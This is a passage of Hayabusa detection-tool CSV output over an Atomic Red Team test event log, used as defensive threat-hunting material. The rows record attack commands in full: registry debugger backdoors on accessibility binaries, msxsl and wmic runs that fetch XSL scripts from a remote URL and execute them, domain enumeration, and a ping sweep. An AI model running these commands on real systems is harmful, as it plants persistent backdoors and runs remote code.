powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:14.692 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:14.827 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:17.941 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:17.963 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:17.990 
+09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:18.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:19.467 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:19.491 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:19.516 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:19.516 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:19.549 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:25.376 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:50.046 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:50.086 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:53.011 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:53.062 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:55.991 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:56.047 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wmic.exe process /FORMAT:list : Path: C:\Windows\System32\wbem\WMIC.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:56.182 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:06.728 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl : Path: C:\Windows\System32\wbem\WMIC.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,SquiblyTwo,,rules/sigma/process_creation/win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:06.888 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:09.823 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: net view /domain : Path: C:\Windows\System32\net.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Windows Network Enumeration,,rules/sigma/process_creation/win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:22.314 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""net view"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: net view : Path: C:\Windows\System32\net.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""net view""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Windows Network Enumeration,,rules/sigma/process_creation/win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:34.797 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:35.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:35.038 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.1 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:35.579 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: 
ping -n 1 -w 100 192.168.1.2 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:35.988 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.3 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:36.549 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.4 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:37.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.5 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:37.513 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.6 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:38.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.7 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:38.517 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.8 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:39.028 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.9 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:39.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.10 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:40.027 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.11 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:40.431 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.12 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:41.066 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.13 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:41.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.14 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:41.894 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.15 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:42.466 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.16 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:43.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.17 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:43.503 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.18 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:44.030 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.19 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:44.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.20 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:45.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.21 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:45.501 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.22 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:46.007 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.23 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 